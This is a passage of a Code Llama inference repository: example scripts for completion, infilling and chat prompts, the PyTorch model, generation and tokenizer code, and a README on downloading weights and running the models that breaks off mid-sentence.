File: example_infilling.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. import fire from llama import Llama def main( ckpt_dir: str, tokenizer_path: str, temperature: float = 0.0, top_p: float = 0.9, max_seq_len: int = 192, max_gen_len: int = 128, max_batch_size: int = 4, ): generator = Llama.build( ckpt_dir=ckpt_dir, tokenizer_path=tokenizer_path, max_seq_len=max_seq_len, max_batch_size=max_batch_size, ) prompts = [ '''def remove_non_ascii(s: str) -> str: """ <FILL> return result ''', """# Installation instructions: ```bash <FILL> ``` This downloads the LLaMA inference code and installs the repository as a local pip package. """, """class InterfaceManagerFactory(AbstractManagerFactory): def __init__(<FILL> def main(): factory = InterfaceManagerFactory(start=datetime.now()) managers = [] for i in range(10): managers.append(factory.build(id=i)) """, """/-- A quasi-prefunctoid is 1-connected iff all its etalisations are 1-connected. -/ theorem connected_iff_etalisation [C D : precategoroid] (P : quasi_prefunctoid C D) : π₁ P = 0 ↔ <FILL> = 0 := begin split, { intros h f, rw pi_1_etalisation at h, simp [h], refl }, { intro h, have := @quasi_adjoint C D P, simp [←pi_1_etalisation, this, h], refl } end """, ] prefixes = [p.split("<FILL>")[0] for p in prompts] suffixes = [p.split("<FILL>")[1] for p in prompts] results = generator.text_infilling( prefixes=prefixes, suffixes=suffixes, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, ) for prompt, result in zip(prompts, results): print("\n================= Prompt text =================\n") print(prompt) print("\n================= Filled text =================\n") print(result["full_text"]) if __name__ == "__main__": fire.Fire(main) File: example_instructions.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from typing import Optional import fire from llama import Llama def main( ckpt_dir: str, tokenizer_path: str, temperature: float = 0.2, top_p: float = 0.95, max_seq_len: int = 512, max_batch_size: int = 8, max_gen_len: Optional[int] = None, ): generator = Llama.build( ckpt_dir=ckpt_dir, tokenizer_path=tokenizer_path, max_seq_len=max_seq_len, max_batch_size=max_batch_size, ) instructions = [ [ { "role": "user", "content": "In Bash, how do I list all text files in the current directory (excluding subdirectories) that have been modified in the last month?", } ], [ { "role": "user", "content": "What is the difference between inorder and preorder traversal? Give an example in Python.", } ], [ { "role": "system", "content": "Provide answers in JavaScript", }, { "role": "user", "content": "Write a function that computes the set of sums of all contiguous sublists of a given list.", } ], ] results = generator.chat_completion( instructions, # type: ignore max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, ) for instruction, result in zip(instructions, results): for msg in instruction: print(f"{msg['role'].capitalize()}: {msg['content']}\n") print( f"> {result['generation']['role'].capitalize()}: {result['generation']['content']}" ) print("\n==================================\n") if __name__ == "__main__": fire.Fire(main) File: example_completion.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from typing import Optional import fire from llama import Llama def main( ckpt_dir: str, tokenizer_path: str, temperature: float = 0.2, top_p: float = 0.9, max_seq_len: int = 256, max_batch_size: int = 4, max_gen_len: Optional[int] = None, ): generator = Llama.build( ckpt_dir=ckpt_dir, tokenizer_path=tokenizer_path, max_seq_len=max_seq_len, max_batch_size=max_batch_size, ) prompts = [ # For these prompts, the expected answer is the natural continuation of the prompt """\ def fizzbuzz(n: int):""", """\ import argparse def main(string: str): print(string) print(string[::-1]) if __name__ == "__main__":""" ] results = generator.text_completion( prompts, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, ) for prompt, result in zip(prompts, results): print(prompt) print(f"> {result['generation']}") print("\n==================================\n") if __name__ == "__main__": fire.Fire(main) File: setup.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from setuptools import find_packages, setup def get_requirements(path: str): return [l.strip() for l in open(path)] setup( name="codellama", version="0.0.1", packages=find_packages(), install_requires=get_requirements("requirements.txt"), ) File: llama/generation.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. import json import os import sys import time from pathlib import Path from typing import List, Literal, Optional, Tuple, TypedDict import torch import torch.nn.functional as F from fairscale.nn.model_parallel.initialize import ( get_model_parallel_rank, initialize_model_parallel, model_parallel_is_initialized, ) from llama.model import ModelArgs, Transformer from llama.tokenizer import Tokenizer if torch.cuda.is_available(): device = "cuda" elif torch.backends.mps.is_available(): device = "mps" else: device = "cpu" Role = Literal["system", "user", "assistant"] class Message(TypedDict): role: Role content: str destination: str # required for model responses class InfillingPrediction(TypedDict, total=False): generation: str full_text: str tokens: List[str] # not required logprobs: List[float] # not required class CompletionPrediction(TypedDict, total=False): generation: str tokens: List[str] # not required logprobs: List[float] # not required class ChatPrediction(TypedDict, total=False): generation: Message tokens: List[str] # not required logprobs: List[float] # not required Dialog = List[Message] B_INST, E_INST = "[INST]", "[/INST]" B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n" SPECIAL_TAGS = [B_INST, E_INST, "<<SYS>>", "<</SYS>>", "<step>"] UNSAFE_ERROR = "Error: special tags are not allowed as part of the prompt." class Llama: @staticmethod def build( ckpt_dir: str, tokenizer_path: str, max_seq_len: int, max_batch_size: int, model_parallel_size: Optional[int] = None, ) -> "Llama": if not torch.distributed.is_initialized(): if device == "cuda": torch.distributed.init_process_group("nccl") else: torch.distributed.init_process_group("gloo") if not model_parallel_is_initialized(): if model_parallel_size is None: model_parallel_size = int(os.environ.get("WORLD_SIZE", 1)) initialize_model_parallel(model_parallel_size) local_rank = int(os.environ.get("LOCAL_RANK", 0)) if device == "cuda": torch.cuda.set_device(local_rank) # seed must be the same in all processes torch.manual_seed(1) if local_rank > 0: sys.stdout = open(os.devnull, "w") start_time = time.time() checkpoints = sorted(Path(ckpt_dir).glob("*.pth")) assert len(checkpoints) > 0, f"no checkpoint files found in {ckpt_dir}" assert model_parallel_size == len( checkpoints ), f"Loading a checkpoint for MP={len(checkpoints)} but world size is {model_parallel_size}" ckpt_path = checkpoints[get_model_parallel_rank()] checkpoint = torch.load(ckpt_path, map_location="cpu") with open(Path(ckpt_dir) / "params.json", "r") as f: params = json.loads(f.read()) model_args: ModelArgs = ModelArgs( max_seq_len=max_seq_len, max_batch_size=max_batch_size, **params, ) tokenizer = Tokenizer(model_path=tokenizer_path) model_args.vocab_size = tokenizer.n_words # support for mac if device == "cuda": if torch.cuda.is_bf16_supported(): torch.set_default_tensor_type(torch.cuda.BFloat16Tensor) else: torch.set_default_tensor_type(torch.cuda.HalfTensor) else: torch.set_default_tensor_type(torch.HalfTensor) model = Transformer(model_args) model.load_state_dict(checkpoint, strict=False) model.to(device) print(f"Loaded in {time.time() - start_time:.2f} seconds") return Llama(model, tokenizer) def __init__(self, model: Transformer, tokenizer: Tokenizer): self.model = model self.tokenizer = tokenizer @torch.inference_mode() def generate( self, prompt_tokens: List[List[int]], max_gen_len: int, temperature: float = 0.6, top_p: float = 0.9, logprobs: bool = False, echo: bool = False, stop_token: Optional[int] = None, ) -> Tuple[List[List[int]], Optional[List[List[float]]]]: if stop_token is None: stop_token = self.tokenizer.eos_id params = self.model.params bsz = len(prompt_tokens) assert bsz <= params.max_batch_size, (bsz, params.max_batch_size) min_prompt_len = min(len(t) for t in prompt_tokens) max_prompt_len = max(len(t) for t in prompt_tokens) assert max_prompt_len <= params.max_seq_len total_len = min(params.max_seq_len, max_gen_len + max_prompt_len) pad_id = self.tokenizer.pad_id tokens = torch.full((bsz, total_len), pad_id, dtype=torch.long, device=device) for k, t in enumerate(prompt_tokens): tokens[k, : len(t)] = torch.tensor(t, dtype=torch.long, device=device) if logprobs: token_logprobs = torch.zeros_like(tokens, dtype=torch.float, device=device) prev_pos = 0 stop_reached = torch.tensor([False] * bsz, device=device) input_text_mask = tokens != pad_id for cur_pos in range(min_prompt_len, total_len): logits = self.model.forward(tokens[:, prev_pos:cur_pos], prev_pos) if logprobs: token_logprobs[:, prev_pos + 1 : cur_pos + 1] = -F.cross_entropy( input=logits.transpose(1, 2), target=tokens[:, prev_pos + 1 : cur_pos + 1], reduction="none", ignore_index=pad_id, ) if temperature > 0: probs = torch.softmax(logits[:, -1] / temperature, dim=-1) next_token = sample_top_p(probs, top_p) else: next_token = torch.argmax(logits[:, -1], dim=-1) next_token = next_token.reshape(-1) # only replace token if prompt has already been generated next_token = torch.where( input_text_mask[:, cur_pos], tokens[:, cur_pos], next_token ) tokens[:, cur_pos] = next_token stop_reached |= (~input_text_mask[:, cur_pos]) & (next_token == stop_token) prev_pos = cur_pos if all(stop_reached): break if logprobs: token_logprobs = token_logprobs.tolist() out_tokens, out_logprobs = [], [] for i, toks in enumerate(tokens.tolist()): # cut to max gen len start = 0 if echo else len(prompt_tokens[i]) toks = toks[start : len(prompt_tokens[i]) + max_gen_len] probs = None if logprobs: probs = token_logprobs[i][start : len(prompt_tokens[i]) + max_gen_len] # cut to stop token if present if stop_token in toks: stop_idx = toks.index(stop_token) toks = toks[:stop_idx] probs = probs[:stop_idx] if logprobs else None out_tokens.append(toks) out_logprobs.append(probs) return (out_tokens, out_logprobs if logprobs else None) def text_completion( self, prompts: List[str], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, echo: bool = False, ) -> List[CompletionPrediction]: if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [self.tokenizer.encode(x, bos=True, eos=False) for x in prompts] generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, echo=echo, ) if logprobs: assert generation_logprobs is not None return [ { "generation": self.tokenizer.decode(t), "tokens": [self.tokenizer.token_piece(x) for x in t], "logprobs": logprobs_i, } for t, logprobs_i in zip(generation_tokens, generation_logprobs) ] return [{"generation": self.tokenizer.decode(t)} for t in generation_tokens] def text_infilling( self, prefixes: List[str], suffixes: List[str], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, suffix_first: bool = False, ) -> List[InfillingPrediction]: assert self.tokenizer.eot_id is not None if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [ infilling_prompt_tokens( self.tokenizer, prefix, suffix, suffix_first=suffix_first ) for prefix, suffix in zip(prefixes, suffixes) ] generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, echo=False, stop_token=self.tokenizer.eot_id, ) generations = [self.tokenizer.decode_infilling(t) for t in generation_tokens] if logprobs: assert generation_logprobs is not None return [ { "generation": generation, "logprobs": logprobs_i, "tokens": [self.tokenizer.token_piece(x) for x in t], "full_text": prefix + generation + suffix, } for prefix, suffix, generation, t, logprobs_i in zip( prefixes, suffixes, generations, generation_tokens, generation_logprobs, ) ] else: return [ { "generation": generation, "full_text": prefix + generation + suffix, } for prefix, suffix, generation in zip(prefixes, suffixes, generations) ] def chat_completion( self, dialogs: List[Dialog], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, ) -> List[ChatPrediction]: if self.tokenizer.step_id is not None: return self._chat_completion_turns( dialogs=dialogs, temperature=temperature, top_p=top_p, max_gen_len=max_gen_len, logprobs=logprobs, ) if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [] unsafe_requests = [] for dialog in dialogs: unsafe_requests.append( any([tag in msg["content"] for tag in SPECIAL_TAGS for msg in dialog]) ) if dialog[0]["role"] == "system": dialog = [ # type: ignore { "role": dialog[1]["role"], "content": B_SYS + dialog[0]["content"] + E_SYS + dialog[1]["content"], } ] + dialog[2:] assert all([msg["role"] == "user" for msg in dialog[::2]]) and all( [msg["role"] == "assistant" for msg in dialog[1::2]] ), ( "model only supports 'system', 'user' and 'assistant' roles, " "starting with 'system', then 'user' and alternating (u/a/u/a/u...)" ) dialog_tokens: List[int] = sum( [ self.tokenizer.encode( f"{B_INST} {prompt['content'].strip()} {E_INST} {answer['content'].strip()} ", bos=True, eos=True, ) for prompt, answer in zip( dialog[::2], dialog[1::2], ) ], [], ) assert ( dialog[-1]["role"] == "user" ), f"Last message must be from user, got {dialog[-1]['role']}" dialog_tokens += self.tokenizer.encode( f"{B_INST} {dialog[-1]['content'].strip()} {E_INST}", bos=True, eos=False, ) prompt_tokens.append(dialog_tokens) generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, ) if logprobs: assert generation_logprobs is not None return [ { "generation": { # type: ignore "role": "assistant", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, }, "tokens": [self.tokenizer.token_piece(x) for x in t], "logprobs": logprobs_i, } for t, logprobs_i, unsafe in zip( generation_tokens, generation_logprobs, unsafe_requests ) ] return [ { "generation": { # type: ignore "role": "assistant", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, } } for t, unsafe in zip(generation_tokens, unsafe_requests) ] def _chat_completion_turns( self, dialogs: List[Dialog], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, ) -> List[ChatPrediction]: if self.tokenizer.step_id is None: raise RuntimeError("Model not suitable for chat_completion_step()") if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [] unsafe_requests = [] for dialog in dialogs: unsafe_requests.append( any([tag in msg["content"] for tag in SPECIAL_TAGS for msg in dialog]) ) # Insert system message if not provided if dialog[0]["role"] != "system": dialog = [{"role": "system", "content": ""}] + dialog # type: ignore dialog_tokens = dialog_prompt_tokens(self.tokenizer, dialog) prompt_tokens.append(dialog_tokens) generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, stop_token=self.tokenizer.step_id, ) if logprobs: assert generation_logprobs is not None return [ { "generation": { "role": "assistant", "destination": "user", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, }, "tokens": [self.tokenizer.token_piece(x) for x in t], "logprobs": logprobs_i, } for t, logprobs_i, unsafe in zip( generation_tokens, generation_logprobs, unsafe_requests ) ] return [ { "generation": { "role": "assistant", "destination": "user", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, } } for t, unsafe in zip(generation_tokens, unsafe_requests) ] def sample_top_p(probs, p): probs_sort, probs_idx = torch.sort(probs, dim=-1, descending=True) probs_sum = torch.cumsum(probs_sort, dim=-1) mask = probs_sum - probs_sort > p probs_sort[mask] = 0.0 probs_sort.div_(probs_sort.sum(dim=-1, keepdim=True)) next_token = torch.multinomial(probs_sort, num_samples=1) next_token = torch.gather(probs_idx, -1, next_token) return next_token def infilling_prompt_tokens( tokenizer: Tokenizer, pre: str, suf: str, suffix_first: bool = False, ) -> List[int]: """ Format and encode an infilling problem. If `suffix_first` is set, format in suffix-prefix-middle format. """ assert tokenizer.prefix_id is not None assert tokenizer.middle_id is not None assert tokenizer.suffix_id is not None if suffix_first: # format as "<PRE> <SUF>{suf} <MID> {pre}" return ( [tokenizer.bos_id, tokenizer.prefix_id, tokenizer.suffix_id] + tokenizer.encode_infilling(suf) + [tokenizer.middle_id] + tokenizer.encode(pre, bos=False, eos=False) ) else: # format as "<PRE> {pre} <SUF>{suf} <MID>" return ( [tokenizer.bos_id, tokenizer.prefix_id] + tokenizer.encode(pre, bos=False, eos=False) + [tokenizer.suffix_id] + tokenizer.encode_infilling(suf) + [tokenizer.middle_id] ) def dialog_prompt_tokens(tokenizer: Tokenizer, dialog: Dialog) -> List[int]: """ Prompt formatting for multi-turn dialogs. The dialog is expected to start with a system message and then alternate between user and assistant messages. """ assert tokenizer.step_id is not None assert all([msg["role"] == "user" for msg in dialog[1::2]]) and all( [msg["role"] == "assistant" for msg in dialog[2::2]] ), ( "model only supports 'system', 'user' and 'assistant' roles, " "starting with 'system', then 'user' and alternating (u/a/u/a/u...)" ) assert ( dialog[-1]["role"] == "user" ), f"Last message must be from user, got {dialog[-1]['role']}" # Format context dialog_tokens: List[int] = [tokenizer.bos_id] headers: List[str] = [] for message in dialog: headers.clear() headers.append(f"Source: {message['role'].strip()}") if message.get("destination") is not None: headers.append(f"Destination: {message['destination'].strip()}") header = " " + "\n".join(headers) dialog_tokens += tokenizer.encode(header, bos=False, eos=False) if message["content"]: body = "\n\n " + message["content"].strip() dialog_tokens += tokenizer.encode(body, bos=False, eos=False) dialog_tokens += [tokenizer.step_id] # Start of reply headers.clear() headers.append("Source: assistant") headers.append("Destination: user") header = " " + "\n".join(headers) dialog_tokens += tokenizer.encode(header, bos=False, eos=False) dialog_tokens += tokenizer.encode("\n\n ", bos=False, eos=False) return dialog_tokens File: llama/__init__.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from .generation import Llama from .model import ModelArgs, Transformer from .tokenizer import Tokenizer File: llama/model.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. import math from dataclasses import dataclass from typing import Any, Optional, Tuple import fairscale.nn.model_parallel.initialize as fs_init import torch import torch.nn.functional as F from fairscale.nn.model_parallel.layers import ( ColumnParallelLinear, ParallelEmbedding, RowParallelLinear, ) from torch import nn if torch.cuda.is_available(): device = "cuda" elif torch.backends.mps.is_available(): device = "mps" else: device = "cpu" @dataclass class ModelArgs: dim: int = 4096 n_layers: int = 32 n_heads: int = 32 n_kv_heads: Optional[int] = None vocab_size: int = -1 # defined later by tokenizer multiple_of: int = 256 # make SwiGLU hidden layer size multiple of large power of 2 ffn_dim_multiplier: Optional[float] = None norm_eps: float = 1e-5 rope_theta: float = 10000 max_batch_size: int = 32 max_seq_len: int = 2048 class RMSNorm(torch.nn.Module): def __init__(self, dim: int, eps: float = 1e-6): super().__init__() self.eps = eps self.weight = nn.Parameter(torch.ones(dim)) def _norm(self, x): return x * torch.rsqrt(x.pow(2).mean(-1, keepdim=True) + self.eps) def forward(self, x): output = self._norm(x.float()).type_as(x) return output * self.weight def precompute_freqs_cis(dim: int, end: int, theta: float = 10000.0): freqs = 1.0 / (theta ** (torch.arange(0, dim, 2)[: (dim // 2)].float() / dim)) t = torch.arange(end, device=freqs.device, dtype=torch.float32) # type: ignore freqs = torch.outer(t, freqs) # type: ignore freqs_cis = torch.polar(torch.ones_like(freqs), freqs) # complex64 return freqs_cis def reshape_for_broadcast(freqs_cis: torch.Tensor, x: torch.Tensor): ndim = x.ndim assert 0 <= 1 < ndim assert freqs_cis.shape == (x.shape[1], x.shape[-1]) shape = [d if i == 1 or i == ndim - 1 else 1 for i, d in enumerate(x.shape)] return freqs_cis.view(*shape) def apply_rotary_emb( xq: torch.Tensor, xk: torch.Tensor, freqs_cis: torch.Tensor, ) -> Tuple[torch.Tensor, torch.Tensor]: if not torch.cuda.is_available(): xq = xq.to('cpu') xk = xk.to('cpu') xq_ = torch.view_as_complex(xq.float().reshape(*xq.shape[:-1], -1, 2)) xk_ = torch.view_as_complex(xk.float().reshape(*xk.shape[:-1], -1, 2)) freqs_cis = reshape_for_broadcast(freqs_cis, xq_) xq_out = torch.view_as_real(xq_ * freqs_cis).flatten(3) xk_out = torch.view_as_real(xk_ * freqs_cis).flatten(3) return xq_out.type_as(xq).to(device), xk_out.type_as(xk).to(device) def repeat_kv(x: torch.Tensor, n_rep: int) -> torch.Tensor: """torch.repeat_interleave(x, dim=2, repeats=n_rep)""" bs, slen, n_kv_heads, head_dim = x.shape if n_rep == 1: return x return ( x[:, :, :, None, :] .expand(bs, slen, n_kv_heads, n_rep, head_dim) .reshape(bs, slen, n_kv_heads * n_rep, head_dim) ) class Attention(nn.Module): def __init__(self, args: ModelArgs): super().__init__() self.n_kv_heads = args.n_heads if args.n_kv_heads is None else args.n_kv_heads model_parallel_size = fs_init.get_model_parallel_world_size() self.n_local_heads = args.n_heads // model_parallel_size self.n_local_kv_heads = self.n_kv_heads // model_parallel_size self.n_rep = self.n_local_heads // self.n_local_kv_heads self.head_dim = args.dim // args.n_heads self.wq = ColumnParallelLinear( args.dim, args.n_heads * self.head_dim, bias=False, gather_output=False, init_method=lambda x: x, ) self.wk = ColumnParallelLinear( args.dim, self.n_kv_heads * self.head_dim, bias=False, gather_output=False, init_method=lambda x: x, ) self.wv = ColumnParallelLinear( args.dim, self.n_kv_heads * self.head_dim, bias=False, gather_output=False, init_method=lambda x: x, ) self.wo = RowParallelLinear( args.n_heads * self.head_dim, args.dim, bias=False, input_is_parallel=True, init_method=lambda x: x, ) self.cache_k = torch.zeros( ( args.max_batch_size, args.max_seq_len, self.n_local_kv_heads, self.head_dim, ) ).to(device) self.cache_v = torch.zeros( ( args.max_batch_size, args.max_seq_len, self.n_local_kv_heads, self.head_dim, ) ).to(device) def forward( self, x: torch.Tensor, start_pos: int, freqs_cis: torch.Tensor, mask: Optional[torch.Tensor], ): bsz, seqlen, _ = x.shape xq, xk, xv = self.wq(x), self.wk(x), self.wv(x) xq = xq.view(bsz, seqlen, self.n_local_heads, self.head_dim) xk = xk.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim) xv = xv.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim) xq, xk = apply_rotary_emb(xq, xk, freqs_cis=freqs_cis) self.cache_k = self.cache_k.to(xq) self.cache_v = self.cache_v.to(xq) self.cache_k[:bsz, start_pos : start_pos + seqlen] = xk self.cache_v[:bsz, start_pos : start_pos + seqlen] = xv keys = self.cache_k[:bsz, : start_pos + seqlen] values = self.cache_v[:bsz, : start_pos + seqlen] # repeat k/v heads if n_kv_heads < n_heads keys = repeat_kv(keys, self.n_rep) # (bs, seqlen, n_local_heads, head_dim) values = repeat_kv(values, self.n_rep) # (bs, seqlen, n_local_heads, head_dim) xq = xq.transpose(1, 2) # (bs, n_local_heads, seqlen, head_dim) keys = keys.transpose(1, 2) values = values.transpose(1, 2) scores = torch.matmul(xq, keys.transpose(2, 3)) / math.sqrt(self.head_dim) if mask is not None: scores = scores + mask # (bs, n_local_heads, seqlen, cache_len + seqlen) scores = F.softmax(scores.float(), dim=-1).type_as(xq) output = torch.matmul(scores, values) # (bs, n_local_heads, seqlen, head_dim) output = output.transpose(1, 2).contiguous().view(bsz, seqlen, -1) return self.wo(output) class FeedForward(nn.Module): def __init__( self, dim: int, hidden_dim: int, multiple_of: int, ffn_dim_multiplier: Optional[float], ): super().__init__() hidden_dim = int(2 * hidden_dim / 3) # custom dim factor multiplier if ffn_dim_multiplier is not None: hidden_dim = int(ffn_dim_multiplier * hidden_dim) hidden_dim = multiple_of * ((hidden_dim + multiple_of - 1) // multiple_of) self.w1 = ColumnParallelLinear( dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x ) self.w2 = RowParallelLinear( hidden_dim, dim, bias=False, input_is_parallel=True, init_method=lambda x: x ) self.w3 = ColumnParallelLinear( dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x ) def forward(self, x): return self.w2(F.silu(self.w1(x)) * self.w3(x)) class TransformerBlock(nn.Module): def __init__(self, layer_id: int, args: ModelArgs): super().__init__() self.n_heads = args.n_heads self.dim = args.dim self.head_dim = args.dim // args.n_heads self.attention = Attention(args) self.feed_forward = FeedForward( dim=args.dim, hidden_dim=4 * args.dim, multiple_of=args.multiple_of, ffn_dim_multiplier=args.ffn_dim_multiplier, ) self.layer_id = layer_id self.attention_norm = RMSNorm(args.dim, eps=args.norm_eps) self.ffn_norm = RMSNorm(args.dim, eps=args.norm_eps) def forward( self, x: torch.Tensor, start_pos: int, freqs_cis: torch.Tensor, mask: Optional[torch.Tensor], ): h = x + self.attention.forward( self.attention_norm(x), start_pos, freqs_cis, mask ) out = h + self.feed_forward.forward(self.ffn_norm(h)) return out class Transformer(nn.Module): def __init__(self, params: ModelArgs): super().__init__() self.params = params self.vocab_size = params.vocab_size self.n_layers = params.n_layers self.tok_embeddings = ParallelEmbedding( params.vocab_size, params.dim, init_method=lambda x: x, ) self.layers = torch.nn.ModuleList() for layer_id in range(params.n_layers): self.layers.append(TransformerBlock(layer_id, params)) self.norm = RMSNorm(params.dim, eps=params.norm_eps) self.output = ColumnParallelLinear( params.dim, params.vocab_size, bias=False, init_method=lambda x: x ) self.freqs_cis = precompute_freqs_cis( self.params.dim // self.params.n_heads, self.params.max_seq_len * 2, params.rope_theta, ) @torch.inference_mode() def forward(self, tokens: torch.Tensor, start_pos: int): _bsz, seqlen = tokens.shape h = self.tok_embeddings(tokens) self.freqs_cis = self.freqs_cis.to("cuda" if device == "cuda" else "cpu") freqs_cis = self.freqs_cis[start_pos : start_pos + seqlen] mask = None if seqlen > 1: mask = torch.full( (1, 1, seqlen, seqlen), float("-inf"), device=torch.device('cpu') ) mask = mask.to(torch.float32).triu(diagonal=start_pos+1).type_as(h) for layer in self.layers: h = layer(h, start_pos, freqs_cis, (mask.to(device) if mask is not None else mask)) h = self.norm(h) output = self.output(h).float() return output File: llama/tokenizer.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. import os from logging import getLogger from typing import List, Optional from sentencepiece import SentencePieceProcessor logger = getLogger() class Tokenizer: def __init__(self, model_path: str): # reload tokenizer assert os.path.isfile(model_path), model_path self.sp_model = SentencePieceProcessor(model_file=model_path) logger.info(f"Reloaded SentencePiece model from {model_path}") # BOS / EOS token IDs self.n_words: int = self.sp_model.vocab_size() self.bos_id: int = self.sp_model.bos_id() self.eos_id: int = self.sp_model.eos_id() self.pad_id: int = self.sp_model.pad_id() # token IDs for special infilling tokens self.prefix_id: Optional[int] = self.sp_model.piece_to_id("▁<PRE>") or None self.middle_id: Optional[int] = self.sp_model.piece_to_id("▁<MID>") or None self.suffix_id: Optional[int] = self.sp_model.piece_to_id("▁<SUF>") or None self.eot_id: Optional[int] = self.sp_model.piece_to_id("▁<EOT>") or None # marker for turn-based step format self.step_id: Optional[int] = self.sp_model.piece_to_id("<step>") or None logger.info( f"#words: {self.n_words} - BOS ID: {self.bos_id} - EOS ID: {self.eos_id} " f"- PRE ID: {self.prefix_id} - MID ID: {self.middle_id} - SUF ID: {self.suffix_id} - EOT ID: {self.eot_id} - STEP ID: {self.step_id}" ) assert self.sp_model.vocab_size() == self.sp_model.get_piece_size() def encode(self, s: str, bos: bool, eos: bool) -> List[int]: assert type(s) is str t = self.sp_model.encode(s) if bos: t = [self.bos_id] + t if eos: t = t + [self.eos_id] return t def decode(self, t: List[int]) -> str: return self.sp_model.decode(list(filter(lambda tk: tk != -1, t))) def token_piece(self, t: int) -> str: return self.sp_model.id_to_piece(t) def encode_infilling(self, s: str) -> List[int]: """Encode a string without an implicit leading space.""" return self.sp_model.encode("☺" + s)[2:] def decode_infilling(self, t: List[int]) -> str: """Decode a string without an implicit leading space.""" return self.sp_model.decode([self.sp_model.piece_to_id("☺")] + t)[1:]
# Introducing Code Llama Code Llama is a family of large language models for code based on [Llama 2](https://github.com/facebookresearch/llama) providing state-of-the-art performance among open models, infilling capabilities, support for large input contexts, and zero-shot instruction following ability for programming tasks. We provide multiple flavors to cover a wide range of applications: foundation models (Code Llama), Python specializations (Code Llama - Python), and instruction-following models (Code Llama - Instruct) with 7B, 13B and 34B parameters each. All models are trained on sequences of 16k tokens and show improvements on inputs with up to 100k tokens. 7B and 13B Code Llama and Code Llama - Instruct variants support infilling based on surrounding content. Code Llama was developed by fine-tuning Llama 2 using a higher sampling of code. As with Llama 2, we applied considerable safety mitigations to the fine-tuned versions of the model. For detailed information on model training, architecture and parameters, evaluations, responsible AI and safety refer to our [research paper](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/). Output generated by code generation features of the Llama Materials, including Code Llama, may be subject to third party licenses, including, without limitation, open source licenses. We are unlocking the power of large language models and our latest version of Code Llama is now accessible to individuals, creators, researchers and businesses of all sizes so that they can experiment, innovate and scale their ideas responsibly. This release includes model weights and starting code for pretrained and fine-tuned Llama language models — ranging from 7B to 34B parameters. This repository is intended as a minimal example to load [Code Llama](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/) models and run inference. [comment]: <> (Code Llama models are compatible with the scripts in llama-recipes) ## Download In order to download the model weights and tokenizers, please visit the [Meta website](https://ai.meta.com/resources/models-and-libraries/llama-downloads/) and accept our License. Once your request is approved, you will receive a signed URL over email. Then run the download.sh script, passing the URL provided when prompted to start the download. Make sure that you copy the URL text itself, **do not use the 'Copy link address' option** when you right click the URL. If the copied URL text starts with: https://download.llamameta.net, you copied it correctly. If the copied URL text starts with: https://l.facebook.com, you copied it the wrong way. Pre-requisites: make sure you have `wget` and `md5sum` installed. Then to run the script: `bash download.sh`. Keep in mind that the links expire after 24 hours and a certain amount of downloads. If you start seeing errors such as `403: Forbidden`, you can always re-request a link. ### Model sizes | Model | Size | |-------|----------| | 7B | ~12.55GB | | 13B | 24GB | | 34B | 63GB | | 70B | 131GB | [comment]: <> (Access on Hugging Face, We are also providing downloads on Hugging Face. You must first request a download from the Meta website using the same email address as your Hugging Face account. After doing so, you can request access to any of the models on Hugging Face and within 1-2 days your account will be granted access to all versions.) ## Setup In a conda environment with PyTorch / CUDA available, clone the repo and run in the top-level directory: ``` pip install -e . ``` ## Inference Different models require different model-parallel (MP) values: | Model | MP | |-------|----| | 7B | 1 | | 13B | 2 | | 34B | 4 | | 70B | 8 | All models, except the 70B python and instruct versions, support sequence lengths up to 100,000 tokens, but we pre-allocate the cache according to `max_seq_len` and `max_batch_size` values. So set those according to your hardware and use-case. ### Pretrained Code Models The Code Llama and Code Llama - Python models are not fine-tuned to follow instructions. They should be prompted so that the expected answer is the natural continuation of the prompt. See `example_completion.py` for some examples. To illustrate, see command below to run it with the 